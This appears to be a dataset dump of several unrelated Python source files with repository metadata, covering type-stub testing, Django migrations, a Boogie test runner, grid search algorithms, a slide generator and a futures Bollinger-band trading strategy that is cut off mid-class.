return filename[top:]
def _get_module_name(filename: str) -> str:
"""Converts a filename {subdir}/m.n/module/foo to module.foo."""
return ".".join(_get_relative(filename).split(os.path.sep)[2:]).replace(".pyi", "").replace(".__init__", "")
def can_run(exe: str, *, args: List[str]) -> bool:
try:
subprocess.run([exe] + args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except OSError:
return False
else:
return True
def _is_version(path: str, version: str) -> bool:
return any("{}{}{}".format(d, os.path.sep, version) in path for d in TYPESHED_SUBDIRS)
def check_subdirs_discoverable(subdir_paths: List[str]) -> None:
for p in subdir_paths:
if not os.path.isdir(p):
raise SystemExit("Cannot find typeshed subdir at {} (specify parent dir via --typeshed-location)".format(p))
def check_python_exes_runnable(*, python27_exe_arg: str, python36_exe_arg: str) -> None:
for exe, version_str in zip([python27_exe_arg, python36_exe_arg], ["27", "36"]):
if can_run(exe, args=["--version"]):
continue
formatted_version = ".".join(list(version_str))
script_arg = "--python{}-exe".format(version_str)
raise SystemExit(
"Cannot run Python {version}. (point to a valid executable via {arg})".format(
version=formatted_version, arg=script_arg
)
)
def determine_files_to_test(*, typeshed_location: str, subdir_paths: Sequence[str]) -> List[Tuple[str, int]]:
"""Determine all files to test, checking if it's in the blacklist and which Python versions to use.
Returns a list of pairs of the file path and Python version as an int."""
skipped = PathMatcher(load_blacklist(typeshed_location))
files = []
for root, _, filenames in itertools.chain.from_iterable(os.walk(p) for p in subdir_paths):
for f in sorted(f for f in filenames if f.endswith(".pyi")):
f = os.path.join(root, f)
rel = _get_relative(f)
if skipped.search(rel):
continue
if _is_version(f, "2and3"):
files.append((f, 2))
files.append((f, 3))
elif _is_version(f, "2"):
files.append((f, 2))
elif _is_version(f, "3"):
files.append((f, 3))
else:
print("Unrecognized path: {}".format(f))
return files
def run_all_tests(
*,
files_to_test: Sequence[Tuple[str, int]],
typeshed_location: str,
python27_exe: str,
python36_exe: str,
print_stderr: bool,
dry_run: bool
) -> None:
bad = []
errors = 0
total_tests = len(files_to_test)
print("Testing files with pytype...")
for i, (f, version) in enumerate(files_to_test):
stderr = (
run_pytype(
filename=f,
python_version="2.7" if version == 2 else "3.6",
python_exe=python27_exe if version == 2 else python36_exe,
typeshed_location=typeshed_location,
)
if not dry_run
else None
)
if stderr:
if print_stderr:
print(stderr)
errors += 1
stacktrace_final_line = stderr.rstrip().rsplit("\n", 1)[-1]
bad.append((_get_relative(f), stacktrace_final_line))
runs = i + 1
if runs % 25 == 0:
print(" {:3d}/{:d} with {:3d} errors".format(runs, total_tests, errors))
print("Ran pytype with {:d} pyis, got {:d} errors.".format(total_tests, errors))
for f, err in bad:
print("{}: {}".format(f, err))
if errors:
raise SystemExit("\nRun again with --print-stderr to get the full stacktrace.")
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
3092c08a731b61558189665e7d2e63d08603ab03 | d9eafd325ab775b7b32af2dd0b63afc7310be53d | /pfwra/home/migrations/0004_auto_20210323_0728.py | 3678a7c488fe83d6dd909f1c2f80b1f809a9fe79 | [
"MIT"
]
| permissive | johnkellehernz/pfwra | 54b0db7debaed629d6003e0826a15bde2fd4a197 | 5b8c718bb2f1aaa34e9a718e07baf270294f7ba6 | refs/heads/main | 2023-05-01T14:39:42.419993 | 2021-05-13T11:00:07 | 2021-05-13T11:00:07 | 353,514,688 | 0 | 0 | MIT | 2021-03-31T23:15:32 | 2021-03-31T23:15:31 | null | UTF-8 | Python | false | false | 1,670 | py | # Generated by Django 3.0.11 on 2021-03-23 07:28
from django.db import migrations, models
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('home', '0003_auto_20210219_0827'),
]
operations = [
migrations.AddField(
model_name='homepage',
name='featured',
field=wagtail.core.fields.StreamField([('cards', wagtail.core.blocks.StructBlock([('link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link label', required=True)), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Choose a page to link to', label='Page', required=False)), ('external_url', wagtail.core.blocks.URLBlock(help_text='Or choose an external URL to link to', label='External URL', required=False))], required=False)), ('header', wagtail.core.blocks.CharBlock(label='Header text')), ('text', wagtail.core.blocks.TextBlock(help_text='Write an introduction for the card', required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(required=False))]))], blank=True, help_text='Featured cards'),
),
migrations.AlterField(
model_name='homepage',
name='hero_cta',
field=models.CharField(blank=True, help_text='Text to display on Call to Action', max_length=255, null=True, verbose_name='Hero CTA'),
),
migrations.AlterField(
model_name='homepage',
name='hero_text',
field=models.CharField(blank=True, help_text='Write an introduction for the homepage', max_length=255, null=True),
),
]
| [
"[email protected]"
]
| |
43b9efcb67283c12ab78d41bf4a139edda32f6a5 | 8101c599bdf68e0fcc2dbc8188640abfebc4a790 | /test/test.py | f651e500372ecdf139f269049f79c37f139d61d8 | [
"BSD-3-Clause"
]
| permissive | symbooglix/boogie-runner | 2a39ddc86d1fee8e3750db6c07f3d20363195390 | 01e1fe993d5eacf7055f1d950a209583c0405fd6 | refs/heads/master | 2021-01-21T04:37:04.636241 | 2016-04-05T16:28:27 | 2016-04-05T16:28:27 | 28,610,541 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,484 | py | #!/usr/bin/env python
# vim: set sw=2 ts=2 softtabstop=2 expandtab:
import argparse
import logging
import os
import pprint
import re
import shutil
import subprocess
import sys
import yaml
testDir = os.path.dirname(os.path.abspath(__file__))
repoDir = os.path.dirname(testDir)
# Hack
sys.path.insert(0, repoDir)
from BoogieRunner import ProgramListLoader
# Another Hack
sys.path.insert(0, os.path.join(repoDir, 'analysis'))
from br_util import FinalResultType, classifyResult
class RunnerTool:
def __init__(self, configFile, listFile, relativePathPrefix, workDir, yamlOutput):
self.configFile = configFile
self.listLocation = listFile
self.relativePathPrefix = relativePathPrefix
self.workDir = workDir
self.yamlOutput = yamlOutput
assert os.path.exists(self.listLocation)
def doCleanUp(self):
shutil.rmtree(self.workDir)
os.remove(self.yamlOutput)
def getFileList(self):
return ProgramListLoader.load(self.listLocation, self.relativePathPrefix)
class BatchRunnerTool(RunnerTool):
def __init__(self, configFile, listFile, relativePathPrefix, workDir, yamlOutput):
super(BatchRunnerTool, self).__init__(configFile, listFile, relativePathPrefix, workDir, yamlOutput)
self.numJobs = 1
def setNumJobs(self, count):
assert count > 0
self.numJobs = count
def getResults(self, testFiles, clean=True):
if os.path.exists(self.yamlOutput):
os.remove(self.yamlOutput)
exitCode = subprocess.call([self.tool,
"--jobs={}".format(self.numJobs),
self.configFile,
self.listLocation,
self.workDir,
self.yamlOutput
])
if exitCode != 0:
logging.error('Tool failed')
sys.exit(1)
if not os.path.exists(self.yamlOutput):
logging.error('cannot find yaml output')
sys.exit(1)
results = None
with open(self.yamlOutput, 'r') as y:
results = yaml.load(y)
if clean:
self.doCleanUp()
return results
@property
def tool(self):
return os.path.join(repoDir, 'boogie-batch-runner.py')
class SingleRunTool(RunnerTool):
def getResults(self, testFiles, clean=False):
logging.warning('clean directive ignored')
# Run over the tests
results = [ ]
for testFile in testFiles.keys():
exitCode = subprocess.call([self.tool,
self.configFile,
testFile,
self.workDir,
self.yamlOutput
])
if exitCode != 0:
logging.error('Tool failed')
sys.exit(1)
if not os.path.exists(self.yamlOutput):
logging.error('Yaml output is missing')
sys.exit(1)
with open(self.yamlOutput, 'r') as f:
results.extend(yaml.load(f))
self.doCleanUp()
return results
@property
def tool(self):
return os.path.join(repoDir, 'boogie-runner.py')
def main(args):
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser()
parser.add_argument("-j", "--jobs", type=int, default=1,
help='jobs to run in parallel. Only works when using batch mode')
parser.add_argument("-k", "--keep-files", dest='keep_files',
action='store_true', default=False)
parser.add_argument("-l", "--list-file", dest='list_file',
type=str, default="simple_boogie_programs.txt")
parser.add_argument("config_file")
parser.add_argument("mode", choices=['single', 'batch'], help="Front end to use. Valid options %(choices)s")
pargs = parser.parse_args(args)
if pargs.mode != 'batch' and pargs.jobs > 1:
logging.error('Can only specify jobs when using "batch" mode')
return 1
# Compute some paths
workDir = os.path.join(testDir, 'working_dir')
yamlOutput = os.path.join(testDir, 'result.yml')
if not os.path.exists(pargs.config_file):
logging.error('Could not find config_file {}'.format(pargs.config_file))
return 1
listFile = os.path.join(testDir, pargs.list_file)
if not os.path.exists(listFile):
logging.error('Could not find list file "{}".'.format(listFile))
return 1
if pargs.mode == 'single':
runnerConstructor = SingleRunTool
elif pargs.mode == 'batch':
runnerConstructor = BatchRunnerTool
else:
logging.error('Invalid mode')
return 1
runner = runnerConstructor(pargs.config_file, listFile, testDir, workDir, yamlOutput)
if pargs.jobs > 1:
runner.setNumJobs(pargs.jobs)
if not os.path.exists(runner.tool):
logging.error('Cannot find {}'.format(runner.tool))
return 1
if os.path.exists(yamlOutput):
logging.error('Yaml output file "{}" exists. Remove it'.format(yamlOutput))
return 1
# Find all the tests
testFiles = {}
filenames = runner.getFileList()
for potentialTest in filenames:
if not os.path.exists(potentialTest):
logging.error('Could not find file "{}"'.format(potentialTest))
return 1
r = re.compile(r'^//\s*(\w+)')
# Read expected test result from first line of file
with open(potentialTest, 'r') as testFile:
line = testFile.readline()
m = r.match(line)
if m == None:
logging.error('Failed to find result on first line of file {}'.format(potentialTest))
return 1
expectedResultStr = m.group(1)
expectedResultEnum = FinalResultType[expectedResultStr]
logging.info('Found test:{} - {}'.format(potentialTest, expectedResultEnum))
testFiles[potentialTest] = expectedResultEnum
# Run tests
if os.path.exists(workDir):
logging.info('removing {}'.format(workDir))
shutil.rmtree(workDir)
os.mkdir(workDir)
results = runner.getResults(testFiles, clean= not pargs.keep_files)
# Check the results against the testFiles
logging.info('Got results:\n{}'.format(pprint.pformat(results)))
for result in results:
filename = result['program']
actualClassification = classifyResult(result)
expectedClassification = testFiles[filename]
if actualClassification != expectedClassification:
logging.error('Result mismatch for {}, expected {}, got {}'.format(
filename, expectedClassification, actualClassification))
return 1
logging.info('SUCCESS!')
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| [
"[email protected]"
]
| |
814bbf98eeee530f21372492d0a0d9f8a9ce62d1 | d8f7b9943049bd483189fe58fd4abf37163866dd | /GUI Code/search.py | 9d83c91ad738a58d3a07107996a978d96e19663f | []
| no_license | NagahShinawy/python-data-structures-algorithms | d14ecd478caa13e36c4f2dcdf942e5f9e9f351e5 | c254f12dca78444e3b2bbd667d4508a699b9fb89 | refs/heads/main | 2023-05-12T17:26:23.477742 | 2021-05-10T07:08:30 | 2021-05-10T07:08:30 | 365,436,195 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,940 | py | """
Python Data Structures - A Game-Based Approach
Robin Andrews - https://compucademy.net/
Search Algorithms for use in GUI.
"""
import config
import heapq
import helper_functions as helpers
from collections import deque
class PriorityQueue:
def __init__(self):
self.elements = []
def is_empty(self):
return len(self.elements) == 0
def put(self, item, priority):
heapq.heappush(self.elements, (priority, item))
def get(self):
return heapq.heappop(self.elements)[1]
def dfs(board, start, goal):
stack = [start]
visited = set()
full_path = []
while stack:
current = stack.pop()
full_path.append(current)
if current == goal:
return full_path
for direction in ["up", "right", "down", "left"]: # Other orders are fine too.
row_offset, col_offset = config.offsets[direction]
neighbour = (current[0] + row_offset, current[1] + col_offset)
if helpers.is_legal_pos(board, neighbour) and neighbour not in visited:
stack.append(neighbour)
visited.add(neighbour)
def bfs(board, start, goal):
queue = deque()
queue.append(start)
visited = set()
full_path = []
while queue:
current = queue.popleft()
full_path.append(current)
if current == goal:
return full_path
for direction in ["up", "right", "down", "left"]:
row_offset, col_offset = config.offsets[direction]
neighbour = (current[0] + row_offset, current[1] + col_offset)
if helpers.is_legal_pos(board, neighbour) and neighbour not in visited:
queue.append(neighbour)
visited.add(neighbour)
def heuristic(a, b):
x1, y1 = a
x2, y2 = b
return abs(x1 - x2) + abs(y1 - y2)
def a_star(board, start_pos, goal_pos):
pq = PriorityQueue()
pq.put(start_pos, 0)
g_values = {}
g_values[start_pos] = 0
full_path = []
while not pq.is_empty():
current_cell_pos = pq.get()
full_path.append(current_cell_pos)
if current_cell_pos == goal_pos:
return full_path
for direction in ["up", "right", "down", "left"]:
row_offset, col_offset = config.offsets[direction]
neighbour = (
current_cell_pos[0] + row_offset,
current_cell_pos[1] + col_offset,
)
new_cost = (
g_values[current_cell_pos] + 1
) # Would be edge weight in a weighted graph
if helpers.is_legal_pos(board, neighbour):
# Second check only applies to weighted graph.
if neighbour not in g_values or new_cost < g_values[neighbour]:
g_values[neighbour] = new_cost
f_value = new_cost + heuristic(goal_pos, neighbour)
pq.put(neighbour, f_value)
| [
"[email protected]"
]
| |
4dee0daf77fa48f37448dd8cf7d857f94c9426d5 | e91ba13a71dc8757e4c6f483d300bb32db8947d4 | /kubernetes-mastery/slides/markmaker.py | d7ef7a0356e368ba4cf696f9414f7f69f63ba6cc | [
"Apache-2.0"
]
| permissive | sijoonlee/kubernetes_study | 752788d4ecf542072436e13ad98b9c67c3b3db2c | 668abacf4f855b55f23562486e420d29397bbe6d | refs/heads/master | 2022-12-22T06:52:51.224364 | 2020-09-30T17:38:18 | 2020-09-30T17:38:18 | 276,719,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,687 | py | #!/usr/bin/env python
# transforms a YAML manifest into a HTML workshop file
import glob
import logging
import os
import re
import string
import subprocess
import sys
import yaml
logging.basicConfig(level=os.environ.get("LOG_LEVEL", "INFO"))
class InvalidChapter(ValueError):
def __init__(self, chapter):
ValueError.__init__(self, "Invalid chapter: {!r}".format(chapter))
def anchor(title):
title = title.lower().replace(' ', '-')
title = ''.join(c for c in title if c in string.ascii_letters+'-')
return "toc-" + title
def interstitials_generator():
images = [url.strip() for url in open("interstitials.txt") if url.strip()]
while True:
for image in images:
yield image
interstitials = interstitials_generator()
def insertslide(markdown, title):
title_position = markdown.find("\n# {}\n".format(title))
slide_position = markdown.rfind("\n---\n", 0, title_position+1)
logging.debug("Inserting title slide at position {}: {}".format(slide_position, title))
before = markdown[:slide_position]
toclink = "toc-chapter-{}".format(title2path[title][0])
_titles_ = [""] + all_titles + [""]
currentindex = _titles_.index(title)
previouslink = anchor(_titles_[currentindex-1])
nextlink = anchor(_titles_[currentindex+1])
interstitial = interstitials.next()
extra_slide = """
---
class: pic
.interstitial[]
---
name: {anchor}
class: title
{title}
.nav[
[Previous section](#{previouslink})
|
[Back to table of contents](#{toclink})
|
[Next section](#{nextlink})
]
.debug[(automatically generated title slide)]
""".format(anchor=anchor(title), interstitial=interstitial, title=title, toclink=toclink, previouslink=previouslink, nextlink=nextlink)
after = markdown[slide_position:]
return before + extra_slide + after
def flatten(titles):
for title in titles:
if isinstance(title, list):
for t in flatten(title):
yield t
else:
yield title
def generatefromyaml(manifest, filename):
manifest = yaml.load(manifest)
markdown, titles = processchapter(manifest["chapters"], filename)
logging.debug("Found {} titles.".format(len(titles)))
toc = gentoc(titles)
markdown = markdown.replace("@@TOC@@", toc)
for title in flatten(titles):
markdown = insertslide(markdown, title)
exclude = manifest.get("exclude", [])
logging.debug("exclude={!r}".format(exclude))
if not exclude:
logging.warning("'exclude' is empty.")
exclude = ",".join('"{}"'.format(c) for c in exclude)
# Insert build info. This is super hackish.
markdown = markdown.replace(
".debug[",
".debug[\n```\n{}\n```\n\nThese slides have been built from commit: {}\n\n".format(dirtyfiles, commit),
1)
markdown = markdown.replace("@@TITLE@@", manifest["title"].replace("\n", "<br/>"))
html = open("workshop.html").read()
html = html.replace("@@MARKDOWN@@", markdown)
html = html.replace("@@EXCLUDE@@", exclude)
html = html.replace("@@CHAT@@", manifest["chat"])
html = html.replace("@@TITLE@@", manifest["title"].replace("\n", " "))
return html
# Maps a section title (the string just after "^# ") to its position
# in the table of content (as a (chapter,part,subpart,...) tuple).
title2path = {}
path2title = {}
all_titles = []
# "tree" is a list of titles, potentially nested.
def gentoc(tree, path=()):
if not tree:
return ""
if isinstance(tree, str):
title = tree
title2path[title] = path
path2title[path] = title
all_titles.append(title)
logging.debug("Path {} Title {}".format(path, title))
return "- [{}](#{})".format(title, anchor(title))
if isinstance(tree, list):
if len(path) == 0:
return "\n---\n".join(gentoc(subtree, path+(i+1,)) for (i,subtree) in enumerate(tree))
elif len(path) == 1:
chapterslide = "name: toc-chapter-{n}\n\n## Chapter {n}\n\n".format(n=path[0])
for (i,subtree) in enumerate(tree):
chapterslide += gentoc(subtree, path+(i+1,)) + "\n\n"
chapterslide += ".debug[(auto-generated TOC)]"
return chapterslide
else:
return "\n\n".join(gentoc(subtree, path+(i+1,)) for (i,subtree) in enumerate(tree))
# Arguments:
# - `chapter` is a string; if it has multiple lines, it will be used as
# a markdown fragment; otherwise it will be considered as a file name
# to be recursively loaded and parsed
# - `filename` is the name of the file that we're currently processing
# (to generate inline comments to facilitate edition)
# Returns: (epxandedmarkdown,[list of titles])
# The list of titles can be nested.
def processchapter(chapter, filename):
if isinstance(chapter, unicode):
return processchapter(chapter.encode("utf-8"), filename)
if isinstance(chapter, str):
if "\n" in chapter:
titles = re.findall("^# (.*)", chapter, re.MULTILINE)
slidefooter = ".debug[{}]".format(makelink(filename))
chapter = chapter.replace("\n---\n", "\n{}\n---\n".format(slidefooter))
chapter += "\n" + slidefooter
return (chapter, titles)
if os.path.isfile(chapter):
return processchapter(open(chapter).read(), chapter)
if isinstance(chapter, list):
chapters = [processchapter(c, filename) for c in chapter]
markdown = "\n---\n".join(c[0] for c in chapters)
titles = [t for (m,t) in chapters if t]
return (markdown, titles)
raise InvalidChapter(chapter)
# Try to figure out the URL of the repo on GitHub.
# This is used to generate "edit me on GitHub"-style links.
try:
if "REPOSITORY_URL" in os.environ:
repo = os.environ["REPOSITORY_URL"]
else:
repo = subprocess.check_output(["git", "config", "remote.origin.url"])
repo = repo.strip().replace("[email protected]:", "https://github.com/")
if "BRANCH" in os.environ:
branch = os.environ["BRANCH"]
else:
branch = subprocess.check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"])
branch = branch.strip()
base = subprocess.check_output(["git", "rev-parse", "--show-prefix"])
base = base.strip().strip("/")
urltemplate = ("{repo}/tree/{branch}/{base}/{filename}"
.format(repo=repo, branch=branch, base=base, filename="{}"))
except:
logging.exception("Could not generate repository URL; generating local URLs instead.")
urltemplate = "file://{pwd}/{filename}".format(pwd=os.environ["PWD"], filename="{}")
try:
commit = subprocess.check_output(["git", "rev-parse", "--short", "HEAD"])
except:
logging.exception("Could not figure out HEAD commit.")
commit = "??????"
try:
dirtyfiles = subprocess.check_output(["git", "status", "--porcelain"])
except:
logging.exception("Could not figure out repository cleanliness.")
dirtyfiles = "?? git status --porcelain failed"
def makelink(filename):
if os.path.isfile(filename):
url = urltemplate.format(filename)
return "[{}]({})".format(filename, url)
else:
return filename
if len(sys.argv) != 2:
logging.error("This program takes one and only one argument: the YAML file to process.")
else:
filename = sys.argv[1]
if filename == "-":
filename = "<stdin>"
manifest = sys.stdin
else:
manifest = open(filename)
logging.info("Processing {}...".format(filename))
sys.stdout.write(generatefromyaml(manifest, filename))
logging.info("Processed {}.".format(filename))
| [
"[email protected]"
]
| |
0c78396cacf3dcb777ca52b8bb646c14114b8fd8 | b323fe5968aea700322428ba6bd239b45bc88c00 | /sohpen/website/migrations/0004_auto_20170518_0707.py | 9cbdfebe44d099d22afdb59741aada8fb2fc3ec3 | []
| no_license | aakashres/sophen | a1862be0fe4aaac51a03f111c1943c1e44f517cb | d84b8e8640f10eef22a79b8afba3e226405f9e5d | refs/heads/master | 2022-11-08T01:46:05.697691 | 2017-11-06T11:10:22 | 2017-11-06T11:10:22 | 273,651,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-18 07:07
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('website', '0003_auto_20170518_0544'),
]
operations = [
migrations.AlterField(
model_name='menu',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='website.Menu'),
),
]
| [
"[email protected]"
]
| |
582d8df350455a0ac4ead2662303513df51bc4e8 | 9dfc5bf5d286c7b7f13ce4c17a8def1eb829d2b4 | /engine/fut/engine/fut_strategyAberration_1.py | 148503356e2de5a64ce79e517a46464f60ac4fbf | []
| no_license | chenzhenhu-yeah/nature | a463058fb4cc600fbcbd6a41edb7df485008aad6 | 368f52181f1ac7c0c8b06623c15faf77b7fc5e36 | refs/heads/master | 2021-06-24T10:20:03.796435 | 2021-01-16T06:40:31 | 2021-01-16T06:40:31 | 193,628,719 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 14,747 | py | # encoding: UTF-8
import os
import pandas as pd
from csv import DictReader
from collections import OrderedDict, defaultdict
from nature import to_log, get_dss, get_contract
from nature import DIRECTION_LONG,DIRECTION_SHORT,OFFSET_OPEN,OFFSET_CLOSE,OFFSET_CLOSETODAY,OFFSET_CLOSEYESTERDAY
from nature import ArrayManager, Signal, Portfolio, TradeData, SignalResult
########################################################################
class Fut_AberrationSignal_Duo(Signal):
#----------------------------------------------------------------------
def __init__(self, portfolio, vtSymbol):
self.type = 'duo'
# 策略参数
self.bollWindow = 80 # 布林通道窗口数
self.bollDev = 2 # 布林通道的偏差
self.fixedSize = 1 # 每次交易的数量
self.initBars = 90 # 初始化数据所用的天数
self.minx = 'min5'
# 策略临时变量
self.bollUp = 0 # 布林通道上轨
self.bollDown = 0 # 布林通道下轨
# 需要持久化保存的变量
self.stop = 0 # 多头止损
Signal.__init__(self, portfolio, vtSymbol)
#----------------------------------------------------------------------
def load_param(self):
filename = get_dss() + 'fut/cfg/signal_aberration_'+self.type+'_param.csv'
if os.path.exists(filename):
df = pd.read_csv(filename)
df = df[ df.pz == get_contract(self.vtSymbol).pz ]
if len(df) > 0:
rec = df.iloc[0,:]
self.bollWindow = rec.bollWindow
self.bollDev = rec.bollDev
print('成功加载策略参数', self.bollWindow, self.bollDev)
#----------------------------------------------------------------------
def set_param(self, param_dict):
if 'bollWindow' in param_dict:
self.bollWindow = param_dict['bollWindow']
print('成功设置策略参数 self.bollWindow: ',self.bollWindow)
if 'bollDev' in param_dict:
self.bollDev = param_dict['bollDev']
print('成功设置策略参数 self.bollDev: ',self.bollDev)
#----------------------------------------------------------------------
def onBar(self, bar, minx='min5'):
"""新推送过来一个bar,进行处理"""
self.bar = bar
if minx == 'min1':
self.on_bar_min1(bar)
else:
self.on_bar_minx(bar)
# r = [[minx,bar.date,bar.time,bar.open,bar.close]]
# df = pd.DataFrame(r)
# filename = get_dss() + 'fut/check/bar_' + self.vtSymbol + '.csv'
# df.to_csv(filename, index=False, mode='a', header=False)
def on_bar_min1(self, bar):
pass
def on_bar_minx(self, bar):
self.am.updateBar(bar)
if not self.am.inited:
return
#print('here')
self.calculateIndicator() # 计算指标
self.generateSignal(bar) # 触发信号,产生交易指令
#----------------------------------------------------------------------
def calculateIndicator(self):
"""计算技术指标"""
self.bollUp, self.bollDown = self.am.boll(self.bollWindow, self.bollDev)
self.stop = (self.bollUp + self.bollDown)/2
#----------------------------------------------------------------------
def generateSignal(self, bar):
# 当前无仓位
if self.unit == 0:
if bar.close > self.bollUp:
self.buy(bar.close, self.fixedSize)
# 持有多头仓位
elif self.unit > 0:
if bar.close < self.stop:
self.sell(bar.close, abs(self.unit))
#----------------------------------------------------------------------
def load_var(self):
filename = get_dss() + 'fut/check/signal_aberration_'+self.type+'_var.csv'
if os.path.exists(filename):
df = pd.read_csv(filename)
df = df[df.vtSymbol == self.vtSymbol]
if len(df) > 0:
rec = df.iloc[-1,:] # 取最近日期的记录
self.unit = rec.unit
if rec.has_result == 1:
self.result = SignalResult()
self.result.unit = rec.result_unit
self.result.entry = rec.result_entry
self.result.exit = rec.result_exit
self.result.pnl = rec.result_pnl
#----------------------------------------------------------------------
def save_var(self):
r = []
if self.result is None:
r = [ [self.portfolio.result.date,self.vtSymbol, self.unit, \
0, 0, 0, 0, 0 ] ]
else:
r = [ [self.portfolio.result.date,self.vtSymbol, self.unit, \
1, self.result.unit, self.result.entry, self.result.exit, self.result.pnl ] ]
df = pd.DataFrame(r, columns=['datetime','vtSymbol','unit', \
'has_result','result_unit','result_entry','result_exit', 'result_pnl'])
filename = get_dss() + 'fut/check/signal_aberration_'+self.type+'_var.csv'
df.to_csv(filename, index=False, mode='a', header=False)
#----------------------------------------------------------------------
def open(self, price, change):
"""开仓"""
self.unit += change
if not self.result:
self.result = SignalResult()
self.result.open(price, change)
r = [ [self.bar.date+' '+self.bar.time, '多' if change>0 else '空', '开', \
abs(change), price, 0 ] ]
df = pd.DataFrame(r, columns=['datetime','direction','offset','volume','price','pnl' ])
filename = get_dss() + 'fut/deal/signal_aberration_'+self.type+'_' + self.vtSymbol + '.csv'
df.to_csv(filename, index=False, mode='a', header=False)
#----------------------------------------------------------------------
def close(self, price):
"""平仓"""
self.unit = 0
self.result.close(price)
r = [ [self.bar.date+' '+self.bar.time, '', '平', \
0, price, self.result.pnl ] ]
df = pd.DataFrame(r, columns=['datetime','direction','offset','volume','price','pnl' ])
filename = get_dss() + 'fut/deal/signal_aberration_'+self.type+'_' + self.vtSymbol + '.csv'
df.to_csv(filename, index=False, mode='a', header=False)
self.result = None
########################################################################
class Fut_AberrationSignal_Kong(Signal):
#----------------------------------------------------------------------
def __init__(self, portfolio, vtSymbol):
self.type = 'kong'
# 策略参数
self.bollWindow = 80 # 布林通道窗口数
self.bollDev = 2 # 布林通道的偏差
self.fixedSize = 1 # 每次交易的数量
self.initBars = 90 # 初始化数据所用的天数
self.minx = 'min5'
# 策略临时变量
self.bollUp = 0 # 布林通道上轨
self.bollDown = 0 # 布林通道下轨
# 需要持久化保存的变量
self.stop = 0 # 多头止损
Signal.__init__(self, portfolio, vtSymbol)
#----------------------------------------------------------------------
def load_param(self):
filename = get_dss() + 'fut/cfg/signal_aberration_'+self.type+'_param.csv'
if os.path.exists(filename):
df = pd.read_csv(filename)
df = df[ df.pz == get_contract(self.vtSymbol).pz ]
if len(df) > 0:
rec = df.iloc[0,:]
self.bollWindow = rec.bollWindow
self.bollDev = rec.bollDev
print('成功加载策略参数', self.bollWindow, self.bollDev)
#----------------------------------------------------------------------
def set_param(self, param_dict):
if 'bollWindow' in param_dict:
self.bollWindow = param_dict['bollWindow']
print('成功设置策略参数 self.bollWindow: ',self.bollWindow)
if 'bollDev' in param_dict:
self.bollDev = param_dict['bollDev']
print('成功设置策略参数 self.bollDev: ',self.bollDev)
#----------------------------------------------------------------------
def onBar(self, bar, minx='min5'):
"""新推送过来一个bar,进行处理"""
self.bar = bar
if minx == 'min1':
self.on_bar_min1(bar)
else:
self.on_bar_minx(bar)
# r = [[minx,bar.date,bar.time,bar.open,bar.close]]
# df = pd.DataFrame(r)
# filename = get_dss() + 'fut/check/bar_' + self.vtSymbol + '.csv'
# df.to_csv(filename, index=False, mode='a', header=False)
def on_bar_min1(self, bar):
pass
def on_bar_minx(self, bar):
self.am.updateBar(bar)
if not self.am.inited:
return
#print('here')
self.calculateIndicator() # 计算指标
self.generateSignal(bar) # 触发信号,产生交易指令
#----------------------------------------------------------------------
def calculateIndicator(self):
"""计算技术指标"""
self.bollUp, self.bollDown = self.am.boll(self.bollWindow, self.bollDev)
self.stop = (self.bollUp + self.bollDown)/2
#----------------------------------------------------------------------
def generateSignal(self, bar):
# 当前无仓位
if self.unit == 0:
if bar.close < self.bollDown:
self.short(bar.close, self.fixedSize)
# 持有空头仓位
elif self.unit < 0:
if bar.close > self.stop:
self.cover(bar.close, abs(self.unit))
#----------------------------------------------------------------------
def load_var(self):
filename = get_dss() + 'fut/check/signal_aberration_'+self.type+'_var.csv'
if os.path.exists(filename):
df = pd.read_csv(filename)
df = df[df.vtSymbol == self.vtSymbol]
if len(df) > 0:
rec = df.iloc[-1,:] # 取最近日期的记录
self.unit = rec.unit
if rec.has_result == 1:
self.result = SignalResult()
self.result.unit = rec.result_unit
self.result.entry = rec.result_entry
self.result.exit = rec.result_exit
self.result.pnl = rec.result_pnl
#----------------------------------------------------------------------
def save_var(self):
r = []
if self.result is None:
r = [ [self.portfolio.result.date,self.vtSymbol, self.unit, \
0, 0, 0, 0, 0 ] ]
else:
r = [ [self.portfolio.result.date,self.vtSymbol, self.unit, \
1, self.result.unit, self.result.entry, self.result.exit, self.result.pnl ] ]
df = pd.DataFrame(r, columns=['datetime','vtSymbol','unit', \
'has_result','result_unit','result_entry','result_exit', 'result_pnl'])
filename = get_dss() + 'fut/check/signal_aberration_'+self.type+'_var.csv'
df.to_csv(filename, index=False, mode='a', header=False)
#----------------------------------------------------------------------
def open(self, price, change):
"""开仓"""
self.unit += change
if not self.result:
self.result = SignalResult()
self.result.open(price, change)
r = [ [self.bar.date+' '+self.bar.time, '多' if change>0 else '空', '开', \
abs(change), price, 0 ] ]
df = pd.DataFrame(r, columns=['datetime','direction','offset','volume','price','pnl' ])
filename = get_dss() + 'fut/deal/signal_aberration_'+self.type+'_' + self.vtSymbol + '.csv'
df.to_csv(filename, index=False, mode='a', header=False)
#----------------------------------------------------------------------
def close(self, price):
"""平仓"""
self.unit = 0
self.result.close(price)
r = [ [self.bar.date+' '+self.bar.time, '', '平', \
0, price, self.result.pnl ] ]
df = pd.DataFrame(r, columns=['datetime','direction','offset','volume','price','pnl' ])
filename = get_dss() + 'fut/deal/signal_aberration_'+self.type+'_' + self.vtSymbol + '.csv'
df.to_csv(filename, index=False, mode='a', header=False)
self.result = None
########################################################################
class Fut_AberrationPortfolio(Portfolio):
#----------------------------------------------------------------------
def __init__(self, engine, symbol_list, signal_param={}):
